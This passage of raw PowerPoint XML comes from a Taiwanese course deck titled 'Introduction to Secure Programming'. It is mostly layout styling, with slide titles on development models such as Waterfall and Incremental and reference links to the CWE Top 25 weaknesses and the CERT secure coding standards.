              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr indent="0" lvl="2" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr indent="0" lvl="3" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr indent="0" lvl="4" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr indent="-12689" lvl="5" marL="457189" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr indent="-12677" lvl="6" marL="914377" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr indent="-12665" lvl="7" marL="1371566" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr indent="-12654" lvl="8" marL="1828754" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Shape 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1200153" y="1484315"/>
            <a:ext cx="10367433" cy="4611686"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425"/>
          <a:lstStyle>
            <a:lvl1pPr indent="-165090" lvl="0" marL="342891" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="555DAB"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="❑"/>
              <a:defRPr b="0" i="0" sz="2800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr indent="-146031" lvl="1" marL="742932" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="555DAB"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="➢"/>
              <a:defRPr b="0" i="0" sz="2400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr indent="-114271" lvl="2" marL="1142971"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3pPr>
            <a:lvl4pPr indent="-114259" lvl="3" marL="1600160"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4pPr>
            <a:lvl5pPr indent="-114249" lvl="4" marL="2057349"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5pPr>
            <a:lvl6pPr indent="-114237" lvl="5" marL="2514537"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6pPr>
            <a:lvl7pPr indent="-114225" lvl="6" marL="2971726"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7pPr>
            <a:lvl8pPr indent="-114213" lvl="7" marL="3428914"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8pPr>
            <a:lvl9pPr indent="-114203" lvl="8" marL="3886103"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9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Shape 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9027585" y="6214471"/>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b="0" i="0" lang="zh-TW" sz="1200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Shape 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2245783" y="6600827"/>
            <a:ext cx="8805333" cy="246220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45700" lIns="91425" rIns="91425" tIns="45700">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="25000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="zh-TW" sz="1000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>©2016 Software Engineering Consortium</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="Shape 16"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1871133" y="1125541"/>
            <a:ext cx="10320867" cy="231775"/>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8" r:id="rId3"/>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 id="2147483660" r:id="rId15"/>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0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0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06.gi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 Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://sec.openedu.tw/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image17.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide20.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/top25/index.html#CWE-434" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/top25/index.html#CWE-311" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/top25/index.html#CWE-250" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/top25/index.html#CWE-807" TargetMode="External"/><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hyperlink" Target="http://cwe.mitre.org/top25/index.html#CWE-89" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/top25/index.html#CWE-78" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/top25/index.html#CWE-798" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/top25/index.html#CWE-352" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/top25/index.html#CWE-120" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/top25/index.html#CWE-79" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/top25/index.html#CWE-306" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/top25/index.html#CWE-862" TargetMode="External"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide21.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/top25/index.html#CWE-307" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/top25/index.html#CWE-131" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/top25/index.html#CWE-134" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/top25/index.html#CWE-601" TargetMode="External"/><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hyperlink" Target="http://cwe.mitre.org/top25/index.html#CWE-22" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/top25/index.html#CWE-494" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/top25/index.html#CWE-327" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/top25/index.html#CWE-190" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/top25/index.html#CWE-863" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/top25/index.html#CWE-829" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/top25/index.html#CWE-732" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/top25/index.html#CWE-676"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13.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08.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0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image" Target="../media/image14.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image12.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 Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.securecoding.cert.org/confluence/display/seccode/SEI+CERT+Coding+Standards" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image16.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0.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image09.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1.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.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4.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image11.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5.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image15.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9" name="Shape 79"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="80" name="Shape 80"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4475167" y="1720850"/>
            <a:ext cx="5509269" cy="1636143"/>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3200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:rPr>
              <a:t>資訊軟體人才培育推廣計畫</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" i="0" lang="zh-TW" sz="3200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" i="0" lang="zh-TW" sz="3200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:rPr>
              <a:t>「軟體工程教學推廣機制」</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" i="0" lang="zh-TW" sz="3200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" i="0" lang="zh-TW" sz="3200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:rPr>
              <a:t>課程規劃-安全軟體設計</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="81" name="Shape 81"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4489450" y="3789362"/>
            <a:ext cx="5638998" cy="1439862"/>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Clr>
                <a:srgbClr val="555DAB"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="zh-TW" sz="2400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Introduction to Secure Programming</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="555DAB"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="zh-TW" sz="2400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>安全程式設計簡介</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="555DAB"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="2400" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS"/>
              <a:ea typeface="Trebuchet MS"/>
              <a:cs typeface="Trebuchet MS"/>
              <a:sym typeface="Trebuchet MS"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="555DAB"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="2400" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS"/>
              <a:ea typeface="Trebuchet MS"/>
              <a:cs typeface="Trebuchet MS"/>
              <a:sym typeface="Trebuchet MS"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="82" name="Shape 82"/>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b="0" i="0" lang="zh-TW" sz="1200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>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3" name="Shape 153"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="154" name="Shape 154"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2123018" y="260351"/>
            <a:ext cx="10068900" cy="827100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW"/>
              <a:t>Waterfall</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="155" name="Shape 155"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9028607" y="6212160"/>
            <a:ext cx="2540100" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45700" lIns="91425" rIns="91425" tIns="45700">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="zh-TW"/>
              <a:t>‹#›</a:t>
            </a:fld>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="156" name="Shape 156"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2291632" y="1912830"/>
            <a:ext cx="6631500" cy="37752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1" name="Shape 161"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="162" name="Shape 162"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2123018" y="260351"/>
            <a:ext cx="10068900" cy="827100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW"/>
              <a:t>Incremental</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="163" name="Shape 163"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9028607" y="6212160"/>
            <a:ext cx="2540100" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45700" lIns="91425" rIns="91425" tIns="45700">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="zh-TW"/>
              <a:t>‹#›</a:t>
            </a:fld>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="164" name="Shape 164"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2123015" y="1832600"/>
            <a:ext cx="7041300" cy="38568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9" name="Shape 169"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="170" name="Shape 170"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1200153" y="1484315"/>
            <a:ext cx="10367400" cy="4611600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="46424D"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW" sz="2400">
                <a:solidFill>
